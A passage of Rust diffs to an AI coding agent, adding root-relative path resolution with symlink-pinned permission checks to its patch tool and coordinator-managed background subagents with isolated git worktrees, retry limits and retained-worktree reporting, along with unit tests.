 /// the dual cap with the shared `text_io::MAX_EDIT_BYTES` (100 MiB) — both
@@ -36,6 +38,7 @@ pub struct ApplyPatchTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl ApplyPatchTool {
@@ -45,6 +48,7 @@ impl ApplyPatchTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -57,7 +61,13 @@ impl ApplyPatchTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -269,17 +279,17 @@ impl Tool for ApplyPatchTool {
                 | PatchOp::Delete { path }
                 | PatchOp::Rename { path, .. } => path,
             };
-            // Shared absolute-path guard (the schema requires absolute
-            // paths for both fields).
-            crate::agent::tools::require_absolute_path(op_path, "the apply_patch path")
-                .map_err(ToolError::Msg)?;
-            if let PatchOp::Rename { new_path, .. } = op {
-                crate::agent::tools::require_absolute_path(
+            let resolved_op_path =
+                resolve_tool_path(self.root.as_ref(), op_path, "the apply_patch path")?;
+            let resolved_op_new_path = if let PatchOp::Rename { new_path, .. } = op {
+                Some(resolve_tool_path(
+                    self.root.as_ref(),
                     new_path,
                     "the apply_patch rename target",
-                )
-                .map_err(ToolError::Msg)?;
-            }
+                )?)
+            } else {
+                None
+            };
 
             // C1 (audit fix): resolve the path THROUGH the permission
             // checker so symlinks are pinned to their canonical target.
@@ -289,23 +299,30 @@ impl Tool for ApplyPatchTool {
             // check-time and open-time. Matches the H12 pattern
             // already applied to read/write/edit.
             let resolved_path = match op {
-                PatchOp::Create { path, .. }
-                | PatchOp::Update { path, .. }
-                | PatchOp::Delete { path }
-                | PatchOp::Rename { path, .. } => {
-                    check_perm_path_resolve(&self.permission, &self.ask_tx, "apply_patch", path)
-                        .await?
+                PatchOp::Create { .. }
+                | PatchOp::Update { .. }
+                | PatchOp::Delete { .. }
+                | PatchOp::Rename { .. } => {
+                    check_perm_path_resolve(
+                        &self.permission,
+                        &self.ask_tx,
+                        "apply_patch",
+                        &resolved_op_path,
+                    )
+                    .await?
                 }
             };
             // Rename also requires permission on the new path; pin
             // its canonical form too.
-            let resolved_new_path = if let PatchOp::Rename { new_path, .. } = op {
+            let resolved_new_path = if let PatchOp::Rename { .. } = op {
                 Some(
                     check_perm_path_resolve(
                         &self.permission,
                         &self.ask_tx,
                         "apply_patch",
-                        new_path,
+                        resolved_op_new_path
+                            .as_deref()
+                            .expect("resolved_op_new_path set for Rename"),
                     )
                     .await?,
                 )

--- a/src/agent/tools/background.rs
+++ b/src/agent/tools/background.rs
@@ -80,6 +80,8 @@ struct Inner {
     /// this, subagents continued to consume API budget after their parent
     /// was gone, eventually notifying a dropped store.
     handles: HashMap<String, JoinHandle<()>>,
+    #[cfg(feature = "git-worktree")]
+    writer_worktrees: HashMap<String, crate::extras::git_worktree::WorktreeInfo>,
     coordinator: Option<CoordinatorState>,
 }
 
@@ -96,20 +98,28 @@ struct CoordinatorState {
 pub struct CoordinatorDispatchInfo {
     pub prompt: String,
     pub is_writer: bool,
+    pub is_isolated_writer: bool,
     pub retry_of: Option<String>,
     pub retried_by: Option<String>,
     pub worktree_branch: Option<String>,
     pub worktree_path: Option<String>,
+    pub worktree_commits: Vec<String>,
+    pub worktree_dirty: Option<bool>,
+    pub worktree_retained: Option<bool>,
 }
 
 #[derive(Debug)]
 struct CoordinatorDispatch {
     prompt: String,
     is_writer: bool,
+    is_isolated_writer: bool,
     retry_of: Option<String>,
     retried_by: Option<String>,
     worktree_branch: Option<String>,
     worktree_path: Option<String>,
+    worktree_commits: Vec<String>,
+    worktree_dirty: Option<bool>,
+    worktree_retained: Option<bool>,
 }
 
 impl CoordinatorState {
@@ -248,14 +258,49 @@ impl BackgroundStore {
         Some(CoordinatorDispatchInfo {
             prompt: dispatch.prompt.clone(),
             is_writer: dispatch.is_writer,
+            is_isolated_writer: dispatch.is_isolated_writer,
             retry_of: dispatch.retry_of.clone(),
             retried_by: dispatch.retried_by.clone(),
             worktree_branch: dispatch.worktree_branch.clone(),
             worktree_path: dispatch.worktree_path.clone(),
+            worktree_commits: dispatch.worktree_commits.clone(),
+            worktree_dirty: dispatch.worktree_dirty,
+            worktree_retained: dispatch.worktree_retained,
         })
     }
 
-    /// Record the persistent worktree allocated for a coordinator writer.
+    pub fn set_coordinator_dispatch_isolated(
+        &self,
+        id: &str,
+        is_isolated_writer: bool,
+    ) -> Result<(), String> {
+        let mut inner = self.lock();
+        let coordinator = inner
+            .coordinator
+            .as_mut()
+            .ok_or_else(|| "coordinator mode is not enabled".to_string())?;
+        if !is_isolated_writer
+            && coordinator
+                .active_task_ids
+                .iter()
+                .filter(|task_id| task_id.as_str() != id)
+                .any(|task_id| {
+                    coordinator
+                        .dispatches
+                        .get(task_id)
+                        .is_some_and(|dispatch| dispatch.is_writer && !dispatch.is_isolated_writer)
+                })
+        {
+            return Err("a serialized writer is already active; wait for batch reconciliation before dispatching another writer".into());
+        }
+        let dispatch = coordinator
+            .dispatches
+            .get_mut(id)
+            .ok_or_else(|| format!("task {id} is not a coordinator dispatch"))?;
+        dispatch.is_isolated_writer = is_isolated_writer;
+        Ok(())
+    }
+
     pub fn set_coordinator_dispatch_worktree(
         &self,
         id: &str,
@@ -273,6 +318,40 @@ impl BackgroundStore {
         Ok(())
     }
 
+    #[cfg(feature = "git-worktree")]
+    pub fn register_writer_worktree(
+        &self,
+        id: String,
+        info: crate::extras::git_worktree::WorktreeInfo,
+    ) {
+        self.lock().writer_worktrees.insert(id, info);
+    }
+
+    #[cfg(feature = "git-worktree")]
+    pub fn unregister_writer_worktree(&self, id: &str) {
+        self.lock().writer_worktrees.remove(id);
+    }
+
+    pub fn set_coordinator_dispatch_worktree_outcome(
+        &self,
+        id: &str,
+        commits: Vec<String>,
+        dirty: bool,
+        retained: bool,
+    ) {
+        let mut inner = self.lock();
+        let Some(dispatch) = inner
+            .coordinator
+            .as_mut()
+            .and_then(|coordinator| coordinator.dispatches.get_mut(id))
+        else {
+            return;
+        };
+        dispatch.worktree_commits = commits;
+        dispatch.worktree_dirty = Some(dirty);
+        dispatch.worktree_retained = Some(retained);
+    }
+
     pub fn insert_for_dispatch(&self, id: String) {
         if self.coordinator_strategy().is_some() {
             self.insert_coordinated(id);
@@ -286,6 +365,7 @@ impl BackgroundStore {
         id: String,
         prompt: String,
         is_writer: bool,
+        is_isolated_writer: bool,
         retry_of: Option<&str>,
     ) -> Result<(), String> {
         let mut inner = self.lock();
@@ -294,12 +374,13 @@ impl BackgroundStore {
         }
 
         if is_writer
+            && !is_isolated_writer
             && inner.coordinator.as_ref().is_some_and(|coordinator| {
                 coordinator.active_task_ids.iter().any(|task_id| {
                     coordinator
                         .dispatches
                         .get(task_id)
-                        .is_some_and(|dispatch| dispatch.is_writer)
+                        .is_some_and(|dispatch| dispatch.is_writer && !dispatch.is_isolated_writer)
                 })
             })
         {
@@ -352,10 +433,14 @@ impl BackgroundStore {
             CoordinatorDispatch {
                 prompt,
                 is_writer,
+                is_isolated_writer,
                 retry_of: retry_of.map(str::to_string),
                 retried_by: None,
                 worktree_branch: None,
                 worktree_path: None,
+                worktree_commits: Vec::new(),
+                worktree_dirty: None,
+                worktree_retained: None,
             },
         );
         Ok(())
@@ -484,6 +569,10 @@ impl BackgroundStore {
         // session; surfacing them in the next session's prompt would
         // be confusing ("you finished a task you didn't start").
         inner.pending.clear();
+        #[cfg(feature = "git-worktree")]
+        for (_, info) in std::mem::take(&mut inner.writer_worktrees) {
+            let _ = crate::extras::git_worktree::remove_worktree_if_clean(&info);
+        }
         inner.coordinator = None;
     }
 
@@ -663,11 +752,40 @@ pub fn followup_from_background_store(
                         } else if matches!(n.state, TaskState::Failed(_)) {
                             body.push_str("retry budget: 1/1 available\n");
                         }
+                        if dispatch.is_writer {
+                            body.push_str(&format!(
+                                "writer isolation: {}\n",
+                                if dispatch.is_isolated_writer {
+                                    "worktree"
+                                } else {
+                                    "serialized parent checkout"
+                                }
+                            ));
+                        }
                         if let Some(branch) = dispatch.worktree_branch {
                             body.push_str(&format!("writer branch: {branch}\n"));
                         }
+                        if let Some(dirty) = dispatch.worktree_dirty {
+                            body.push_str(&format!(
+                                "writer worktree: {}\n",
+                                if dirty {
+                                    "dirty; retained for salvage"
+                                } else {
+                                    "clean"
+                                }
+                            ));
+                        }
+                        if !dispatch.worktree_commits.is_empty() {
+                            body.push_str(&format!(
+                                "writer commits: {}\n",
+                                dispatch.worktree_commits.join(", ")
+                            ));
+                        }
                         if let Some(path) = dispatch.worktree_path {
-                            body.push_str(&format!("writer worktree retained: {path}\n"));
+                            body.push_str(&format!("writer salvage path: {path}\n"));
+                        }
+                        if dispatch.worktree_retained == Some(false) {
+                            body.push_str("writer worktree removed (clean with no commits)\n");
                         }
                     }
                     match &n.state {
@@ -794,13 +912,14 @@ mod tests {
         let store = BackgroundStore::new();
         store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
         store
-            .insert_coordinator_dispatch("first".into(), "failed work".into(), false, None)
+            .insert_coordinator_dispatch("first".into(), "failed work".into(), false, false, None)
             .unwrap();
         store.notify("first", TaskState::Failed("boom".into()));
         store
             .insert_coordinator_dispatch(
                 "retry".into(),
                 "retry failed work".into(),
+                false,
                 false,
                 Some("first"),
             )
@@ -811,6 +930,7 @@ mod tests {
                 "second-retry".into(),
                 "retry again".into(),
                 false,
+                false,
                 Some("first"),
             )
             .unwrap_err();
@@ -818,18 +938,30 @@ mod tests {
     }
 
     #[test]
+    fn coordinator_allows_concurrent_isolated_writers() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch("writer-one".into(), "edit one".into(), true, true, None)
+            .unwrap();
+        store
+            .insert_coordinator_dispatch("writer-two".into(), "edit two".into(), true, true, None)
+            .unwrap();
+    }
+
+    #[test]
     fn coordinator_serializes_writers_but_not_readers() {
         let store = BackgroundStore::new();
         store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
         store
-            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, None)
+            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, false, None)
             .unwrap();
         store
-            .insert_coordinator_dispatch("reader".into(), "inspect code".into(), false, None)
+            .insert_coordinator_dispatch("reader".into(), "inspect code".into(), false, false, None)
             .unwrap();
 
         let error = store
-            .insert_coordinator_dispatch("writer-two".into(), "edit more".into(), true, None)
+            .insert_coordinator_dispatch("writer-two".into(), "edit more".into(), true, false, None)
             .unwrap_err();
         assert!(error.contains("serialized writer"));
     }
@@ -839,7 +971,7 @@ mod tests {
         let store = BackgroundStore::new();
         store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
         store
-            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, None)
+            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, false, None)
             .unwrap();
 
         store

--- a/src/agent/tools/background.rs
+++ b/src/agent/tools/background.rs
@@ -1311,7 +1311,7 @@ mod tests {
 
         let out = prepend_pending_notifications("user msg", Some(&store));
         assert!(out.starts_with("<system-reminder>\n"));
-        assert!(out.contains("Task t1 (completed):"));
+        assert!(out.contains("[task t1] completed: the result"));
         assert!(out.contains("the result"));
         assert!(out.contains("</system-reminder>\n\n"));
         assert!(out.ends_with("user msg"));
@@ -1324,7 +1324,7 @@ mod tests {
         store.notify("t1", TaskState::Failed("kaboom".into()));
 
         let out = prepend_pending_notifications("user msg", Some(&store));
-        assert!(out.contains("Task t1 (failed):"));
+        assert!(out.contains("[task t1] failed: kaboom"));
         assert!(out.contains("kaboom"));
     }
 
@@ -1384,9 +1384,9 @@ mod tests {
         }
         let out = prepend_pending_notifications("msg", Some(&store));
         // FIFO order preserved.
-        let i0 = out.find("Task t0").unwrap();
-        let i1 = out.find("Task t1").unwrap();
-        let i2 = out.find("Task t2").unwrap();
+        let i0 = out.find("[task t0]").unwrap();
+        let i1 = out.find("[task t1]").unwrap();
+        let i2 = out.find("[task t2]").unwrap();
         assert!(i0 < i1 && i1 < i2);
     }
 

--- a/src/agent/tools/background.rs
+++ b/src/agent/tools/background.rs
@@ -122,6 +122,15 @@ struct CoordinatorDispatch {
     worktree_retained: Option<bool>,
 }
 
+/// A writer worktree that was left on disk because it contains
+/// uncommitted or dirty work. Surfaced by `cancel_all` so the user
+/// can find their salvaged work after a session swap.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct RetainedWorktree {
+    pub branch: Option<String>,
+    pub path: Option<String>,
+}
+
 impl CoordinatorState {
     fn new(
         strategy: SubagentDispatchStrategy,
@@ -521,16 +530,53 @@ impl BackgroundStore {
         }
     }
 
+    /// Notify the task to a terminal state ONLY if it is currently
+    /// `Running`. If the task already reached a terminal state
+    /// (via explicit `notify`), this call is a no-op — it won't
+    /// clobber the real result or re-enqueue a duplicate notification.
+    /// Used by drop guards to catch panics / early-returns in spawned
+    /// closures without overwriting a successful completion.
+    pub fn notify_if_running(&self, id: &str, state: TaskState) {
+        if matches!(state, TaskState::Running) {
+            // Refuse to "transition" Running → Running.
+            return;
+        }
+        let inner = self.lock();
+        let task_is_running = inner
+            .tasks
+            .get(id)
+            .is_some_and(|t| matches!(t.state, TaskState::Running));
+        if !task_is_running {
+            return;
+        }
+        // Delegate to normal notify — it already handles truncation,
+        // handle removal, pending queue, and UI event. Since we've
+        // verified the state is still Running, this is the only path
+        // that will fire.
+        drop(inner);
+        self.notify(id, state);
+    }
+
     /// Attach the `JoinHandle` of a freshly-spawned background subagent
     /// task to its id. Called immediately after the spawn in
     /// `task.rs` so `cancel_all` has something to abort on session
-    /// switch. Re-attaching for an id whose task already completed
-    /// (handle removed by `notify`) is a no-op; re-attaching for a
-    /// still-running id replaces and drops the previous handle.
+    /// switch. Only attaches when the task is still `Running` — if the
+    /// spawned closure already finished (called `notify` from another
+    /// thread) the state is terminal and the handle is dropped.
+    /// Re-attaching for a still-running id replaces and drops the
+    /// previous handle.
     pub fn attach_handle(&self, id: &str, handle: JoinHandle<()>) {
         let mut inner = self.lock();
-        // Only keep the handle if the task is still tracked.
-        if !inner.tasks.contains_key(id) {
+        // Only keep the handle if the task is still tracked AND still
+        // Running. On a multi-thread runtime the spawned closure can
+        // race ahead and finish (notify) before we get here — the task
+        // entry lives in `tasks` even post-notify (for task_status
+        // lookup), so `contains_key` alone isn't enough.
+        let is_running = inner
+            .tasks
+            .get(id)
+            .is_some_and(|t| matches!(t.state, TaskState::Running));
+        if !is_running {
             return;
         }
         if let Some(prev) = inner.handles.insert(id.to_string(), handle) {
@@ -549,7 +595,12 @@ impl BackgroundStore {
     /// parent agent no longer sees. Drained `pending` notifications
     /// are also cleared — they belong to the previous session and
     /// would otherwise surface in the new session's first turn.
-    pub fn cancel_all(&self) {
+    ///
+    /// Returns a list of writer worktrees that were *retained* on disk
+    /// (dirty or have uncommitted work) so the caller can surface their
+    /// paths to the user — otherwise the coordinator metadata would be
+    /// lost and the user would have orphaned `dirge-task-*` worktrees.
+    pub fn cancel_all(&self) -> Vec<RetainedWorktree> {
         let mut inner = self.lock();
         // Abort handles. `abort()` is best-effort: the awaiter inside
         // the task (e.g. `model.btw_query`) gets dropped at the next
@@ -574,7 +625,35 @@ impl BackgroundStore {
         for (_, info) in std::mem::take(&mut inner.writer_worktrees) {
             let _ = crate::extras::git_worktree::remove_worktree_if_clean(&info);
         }
+        // Collect retained writer worktrees BEFORE dropping the
+        // coordinator so we can tell the user where their salvaged
+        // work lives. remove_worktree_if_clean leaves dirty/committed
+        // worktrees on disk — without this metadata the user gets
+        // orphaned `dirge-task-*` dirs with no report.
+        let retained = if let Some(coordinator) = &inner.coordinator {
+            let retained: Vec<RetainedWorktree> = coordinator
+                .dispatches
+                .values()
+                .filter(|d| d.is_writer && d.worktree_retained == Some(true))
+                .map(|d| RetainedWorktree {
+                    branch: d.worktree_branch.clone(),
+                    path: d.worktree_path.clone(),
+                })
+                .collect();
+            for r in &retained {
+                tracing::warn!(
+                    target: "dirge::subagent",
+                    branch = ?r.branch,
+                    path = ?r.path,
+                    "retained writer worktree after cancel — uncommitted work preserved on disk",
+                );
+            }
+            retained
+        } else {
+            Vec::new()
+        };
         inner.coordinator = None;
+        retained
     }
 
     /// Fire a Started lifecycle event for the UI. No effect on the LLM-side
@@ -1019,6 +1098,81 @@ mod tests {
         assert!(BackgroundStore::new().get("nope").is_none());
     }
 
+    /// C1: `attach_handle` after terminal notify must NOT leak a
+    /// phantom "running" slot into `handles` — the spawned-closure
+    /// can race ahead on a multi-thread runtime and finish (notify)
+    /// BEFORE the parent calls `attach_handle`. Only Running tasks
+    /// get their handle tracked; a terminal task drops the handle.
+    #[tokio::test]
+    async fn attach_handle_after_terminal_notify_is_noop() {
+        let store = BackgroundStore::new();
+        store.insert("t1".into());
+
+        // Simulate the spawned task finishing first.
+        store.notify("t1", TaskState::Completed("done".into()));
+        assert_eq!(store.running_count(), 0, "notify removes from handles");
+
+        // Now attach happens — task exists but is Completed, so
+        // attach must NOT insert the handle.
+        let dummy_handle = tokio::spawn(async {});
+        store.attach_handle("t1", dummy_handle);
+        assert_eq!(
+            store.running_count(),
+            0,
+            "attach_handle after terminal notify must not leak"
+        );
+
+        // Normal case: attach while Running → handle tracked.
+        store.insert("t2".into());
+        assert_eq!(store.get("t2").unwrap().state, TaskState::Running);
+        let handle2 = tokio::spawn(async {});
+        store.attach_handle("t2", handle2);
+        assert_eq!(
+            store.running_count(),
+            1,
+            "attach on Running must track handle"
+        );
+    }
+
+    /// C2: `notify_if_running` transitions a Running task to terminal
+    /// but is a no-op when the task is already terminal (so the drop
+    /// guard can't clobber a real result).
+    #[test]
+    fn notify_if_running_guards_against_clobber() {
+        let store = BackgroundStore::new();
+
+        // notify_if_running on Running task → transitions.
+        store.insert("t1".into());
+        store.notify_if_running("t1", TaskState::Failed("early exit".into()));
+        assert_eq!(
+            store.get("t1").unwrap().state,
+            TaskState::Failed("early exit".into()),
+            "notify_if_running must transition Running → Failed"
+        );
+
+        // notify_if_running on terminal task → no-op.
+        store.insert("t2".into());
+        store.notify("t2", TaskState::Completed("real result".into()));
+        store.notify_if_running("t2", TaskState::Failed("late bump".into()));
+        assert_eq!(
+            store.get("t2").unwrap().state,
+            TaskState::Completed("real result".into()),
+            "notify_if_running on terminal task must not clobber"
+        );
+
+        // notify_if_running with Running state is refused.
+        store.insert("t3".into());
+        store.notify_if_running("t3", TaskState::Running);
+        assert_eq!(
+            store.get("t3").unwrap().state,
+            TaskState::Running,
+            "notify_if_running with Running must be a no-op"
+        );
+
+        // notify_if_running on missing id → no-op (no panic).
+        store.notify_if_running("ghost", TaskState::Failed("nope".into()));
+    }
+
     /// Audit C6: `cancel_all` must abort in-flight handles, mark
     /// Running tasks as Failed("cancelled"), and clear pending
     /// notifications so the next session doesn't inherit them.
@@ -1063,6 +1217,60 @@ mod tests {
 
         // Give the runtime a tick so the abort lands.
         tokio::task::yield_now().await;
+    }
+
+    /// C3: `cancel_all` collects and returns retained writer worktree
+    /// metadata BEFORE dropping the coordinator, so the user can find
+    /// their salvaged work instead of orphaned `dirge-task-*` dirs.
+    #[test]
+    fn cancel_all_reports_retained_worktrees() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+
+        // Seed a writer dispatch with a retained worktree.
+        store
+            .insert_coordinator_dispatch("w1".into(), "edit".into(), true, false, None)
+            .unwrap();
+        store
+            .set_coordinator_dispatch_worktree(
+                "w1",
+                "dirge-task-w1".into(),
+                "/tmp/dirge-task-w1".into(),
+            )
+            .unwrap();
+        store.set_coordinator_dispatch_worktree_outcome(
+            "w1",
+            vec!["abc123".into()],
+            true, // dirty
+            true, // retained
+        );
+
+        let retained = store.cancel_all();
+        assert_eq!(
+            retained.len(),
+            1,
+            "retained writer worktree must be reported"
+        );
+        assert_eq!(retained[0].branch.as_deref(), Some("dirge-task-w1"));
+        assert_eq!(retained[0].path.as_deref(), Some("/tmp/dirge-task-w1"));
+    }
+
+    /// C3: non-writer and non-retained dispatches must NOT appear in cancel_all output.
+    #[test]
+    fn cancel_all_omits_non_retained_and_readers() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+
+        // READER: non-writer — must not appear.
+        store
+            .insert_coordinator_dispatch("r1".into(), "read".into(), false, false, None)
+            .unwrap();
+
+        let retained = store.cancel_all();
+        assert!(
+            retained.is_empty(),
+            "non-writer dispatches must not appear in retained list"
+        );
     }
 
     // Regression: previously get() evicted completed/failed tasks. The new

--- a/src/agent/tools/background.rs
+++ b/src/agent/tools/background.rs
@@ -1,4 +1,5 @@
 #[allow(unused_imports)]
+use crate::config::SubagentDispatchStrategy;
 use crate::sync_util::LockExt;
 use indexmap::IndexMap;
 use std::collections::{HashMap, VecDeque};
@@ -79,6 +80,51 @@ struct Inner {
     /// this, subagents continued to consume API budget after their parent
     /// was gone, eventually notifying a dropped store.
     handles: HashMap<String, JoinHandle<()>>,
+    coordinator: Option<CoordinatorState>,
+}
+
+#[derive(Debug)]
+struct CoordinatorState {
+    strategy: SubagentDispatchStrategy,
+    next_generation: u64,
+    active_task_ids: Vec<String>,
+    profiles: crate::agent::tools::task::CoordinatorProfiles,
+    dispatches: IndexMap<String, CoordinatorDispatch>,
+}
+
+#[derive(Debug, Clone)]
+pub struct CoordinatorDispatchInfo {
+    pub prompt: String,
+    pub is_writer: bool,
+    pub retry_of: Option<String>,
+    pub retried_by: Option<String>,
+    pub worktree_branch: Option<String>,
+    pub worktree_path: Option<String>,
+}
+
+#[derive(Debug)]
+struct CoordinatorDispatch {
+    prompt: String,
+    is_writer: bool,
+    retry_of: Option<String>,
+    retried_by: Option<String>,
+    worktree_branch: Option<String>,
+    worktree_path: Option<String>,
+}
+
+impl CoordinatorState {
+    fn new(
+        strategy: SubagentDispatchStrategy,
+        profiles: crate::agent::tools::task::CoordinatorProfiles,
+    ) -> Self {
+        Self {
+            strategy,
+            next_generation: 1,
+            active_task_ids: Vec::new(),
+            profiles,
+            dispatches: IndexMap::new(),
+        }
+    }
 }
 
 #[derive(Debug, Clone, PartialEq)]
@@ -135,6 +181,200 @@ impl BackgroundStore {
                 state: TaskState::Running,
             },
         );
+    }
+
+    #[cfg(test)]
+    pub fn enable_coordinator(&self, strategy: SubagentDispatchStrategy) {
+        self.enable_coordinator_with_profiles(strategy, Default::default());
+    }
+
+    pub fn enable_coordinator_with_profiles(
+        &self,
+        strategy: SubagentDispatchStrategy,
+        profiles: crate::agent::tools::task::CoordinatorProfiles,
+    ) {
+        if strategy == SubagentDispatchStrategy::Off {
+            return;
+        }
+        self.lock().coordinator = Some(CoordinatorState::new(strategy, profiles));
+    }
+
+    pub fn coordinator_strategy(&self) -> Option<SubagentDispatchStrategy> {
+        self.lock().coordinator.as_ref().map(|state| state.strategy)
+    }
+
+    pub fn coordinator_preamble(&self) -> Option<String> {
+        let inner = self.lock();
+        let coordinator = inner.coordinator.as_ref()?;
+        let mode = match coordinator.strategy {
+            SubagentDispatchStrategy::Optional => {
+                "Optional mode permits direct trivial work; coordinated work must follow this contract."
+            }
+            SubagentDispatchStrategy::Full => {
+                "Full mode requires substantive tier-routed work to use background dispatch."
+            }
+            SubagentDispatchStrategy::Off => return None,
+        };
+        let profiles = |items: &[crate::agent::tools::task::CoordinatorProfile]| {
+            items
+                .iter()
+                .map(|profile| match &profile.description {
+                    Some(description) => format!("- {} — {}", profile.name, description),
+                    None => format!("- {}", profile.name),
+                })
+                .collect::<Vec<_>>()
+                .join("\n")
+        };
+        Some(format!(
+            "Coordinator dispatch is enabled. {mode}\n\nRead-only subagent profiles:\n{}\n\nRead-write subagent profiles:\n{}\n\nDispatch at most four background subagents per wave. Reconcile the complete batch before dispatching more work. Do not poll task_status for partial output. A failed coordinator task may be retried once with retry_of=<task-id>; then repair on the main thread. Writers are serialized until rooted worktree isolation is available. Keep internal reconciliation summaries private and provide the user only a final summary. Do not combine this strategy with plugins/orchestrator.janet or plugins/delegate.janet.",
+            profiles(&coordinator.profiles.readonly),
+            profiles(&coordinator.profiles.readwrite),
+        ))
+    }
+
+    pub fn task_is_awaiting_coordinator_delivery(&self, id: &str) -> Option<u64> {
+        let inner = self.lock();
+        let coordinator = inner.coordinator.as_ref()?;
+        coordinator
+            .active_task_ids
+            .iter()
+            .any(|task_id| task_id == id)
+            .then_some(coordinator.next_generation)
+    }
+
+    pub fn coordinator_dispatch(&self, id: &str) -> Option<CoordinatorDispatchInfo> {
+        let inner = self.lock();
+        let dispatch = inner.coordinator.as_ref()?.dispatches.get(id)?;
+        Some(CoordinatorDispatchInfo {
+            prompt: dispatch.prompt.clone(),
+            is_writer: dispatch.is_writer,
+            retry_of: dispatch.retry_of.clone(),
+            retried_by: dispatch.retried_by.clone(),
+            worktree_branch: dispatch.worktree_branch.clone(),
+            worktree_path: dispatch.worktree_path.clone(),
+        })
+    }
+
+    /// Record the persistent worktree allocated for a coordinator writer.
+    pub fn set_coordinator_dispatch_worktree(
+        &self,
+        id: &str,
+        branch: String,
+        worktree_path: String,
+    ) -> Result<(), String> {
+        let mut inner = self.lock();
+        let dispatch = inner
+            .coordinator
+            .as_mut()
+            .and_then(|coordinator| coordinator.dispatches.get_mut(id))
+            .ok_or_else(|| format!("task {id} is not a coordinator dispatch"))?;
+        dispatch.worktree_branch = Some(branch);
+        dispatch.worktree_path = Some(worktree_path);
+        Ok(())
+    }
+
+    pub fn insert_for_dispatch(&self, id: String) {
+        if self.coordinator_strategy().is_some() {
+            self.insert_coordinated(id);
+        } else {
+            self.insert(id);
+        }
+    }
+
+    pub fn insert_coordinator_dispatch(
+        &self,
+        id: String,
+        prompt: String,
+        is_writer: bool,
+        retry_of: Option<&str>,
+    ) -> Result<(), String> {
+        let mut inner = self.lock();
+        if inner.coordinator.is_none() {
+            return Err("coordinator mode is not enabled".into());
+        }
+
+        if is_writer
+            && inner.coordinator.as_ref().is_some_and(|coordinator| {
+                coordinator.active_task_ids.iter().any(|task_id| {
+                    coordinator
+                        .dispatches
+                        .get(task_id)
+                        .is_some_and(|dispatch| dispatch.is_writer)
+                })
+            })
+        {
+            return Err(
+                "a serialized writer is already active; wait for batch reconciliation before dispatching another writer"
+                    .into(),
+            );
+        }
+
+        if let Some(original_id) = retry_of {
+            let failed = matches!(
+                inner.tasks.get(original_id).map(|task| &task.state),
+                Some(TaskState::Failed(_))
+            );
+            if !failed {
+                return Err(format!(
+                    "task {original_id} must have failed before it can be retried"
+                ));
+            }
+            let original = inner
+                .coordinator
+                .as_mut()
+                .and_then(|coordinator| coordinator.dispatches.get_mut(original_id))
+                .ok_or_else(|| {
+                    format!(
+                        "task {original_id} is not a coordinator dispatch and cannot be retried"
+                    )
+                })?;
+            if original.retried_by.is_some() {
+                return Err(format!(
+                    "task {original_id} has already used its coordinator retry. Reconcile and repair the work on the main thread."
+                ));
+            }
+            original.retried_by = Some(id.clone());
+        }
+
+        if !inner.tasks.contains_key(&id) && inner.tasks.len() >= STORE_CAPACITY {
+            inner.tasks.shift_remove_index(0);
+        }
+        inner.tasks.insert(
+            id.clone(),
+            BackgroundTask {
+                state: TaskState::Running,
+            },
+        );
+        let coordinator = inner.coordinator.as_mut().expect("checked above");
+        coordinator.active_task_ids.push(id.clone());
+        coordinator.dispatches.insert(
+            id,
+            CoordinatorDispatch {
+                prompt,
+                is_writer,
+                retry_of: retry_of.map(str::to_string),
+                retried_by: None,
+                worktree_branch: None,
+                worktree_path: None,
+            },
+        );
+        Ok(())
+    }
+
+    pub fn insert_coordinated(&self, id: String) {
+        let mut inner = self.lock();
+        if !inner.tasks.contains_key(&id) && inner.tasks.len() >= STORE_CAPACITY {
+            inner.tasks.shift_remove_index(0);
+        }
+        inner.tasks.insert(
+            id.clone(),
+            BackgroundTask {
+                state: TaskState::Running,
+            },
+        );
+        if let Some(coordinator) = &mut inner.coordinator {
+            coordinator.active_task_ids.push(id);
+        }
     }
 
     /// Look up the current state of a task without mutating the store.
@@ -244,6 +484,7 @@ impl BackgroundStore {
         // session; surfacing them in the next session's prompt would
         // be confusing ("you finished a task you didn't start").
         inner.pending.clear();
+        inner.coordinator = None;
     }
 
     /// Fire a Started lifecycle event for the UI. No effect on the LLM-side
@@ -262,7 +503,61 @@ impl BackgroundStore {
     /// The payload is the state captured at notify time, so subsequent task
     /// eviction does not affect what the agent receives.
     pub fn drain_notifications(&self) -> Vec<TaskNotification> {
-        self.lock().pending.drain(..).collect()
+        let mut inner = self.lock();
+        let Some(coordinator) = inner.coordinator.as_ref() else {
+            return inner.pending.drain(..).collect();
+        };
+        let active_task_ids = coordinator.active_task_ids.clone();
+        if active_task_ids.is_empty() {
+            return inner.pending.drain(..).collect();
+        }
+        let terminal = active_task_ids.iter().all(|id| {
+            !matches!(
+                inner.tasks.get(id).map(|task| &task.state),
+                Some(TaskState::Running)
+            )
+        });
+        if !terminal {
+            let tracked: std::collections::HashSet<_> =
+                active_task_ids.iter().map(String::as_str).collect();
+            let mut deliverable = Vec::new();
+            let mut held = VecDeque::new();
+            while let Some(notification) = inner.pending.pop_front() {
+                if tracked.contains(notification.id.as_str()) {
+                    held.push_back(notification);
+                } else {
+                    deliverable.push(notification);
+                }
+            }
+            inner.pending = held;
+            return deliverable;
+        }
+
+        let coordinator = inner.coordinator.as_mut().expect("checked above");
+        let tracked_ids = std::mem::take(&mut coordinator.active_task_ids);
+        coordinator.next_generation += 1;
+        let tracked: std::collections::HashSet<_> =
+            tracked_ids.iter().map(String::as_str).collect();
+        let mut retained = VecDeque::new();
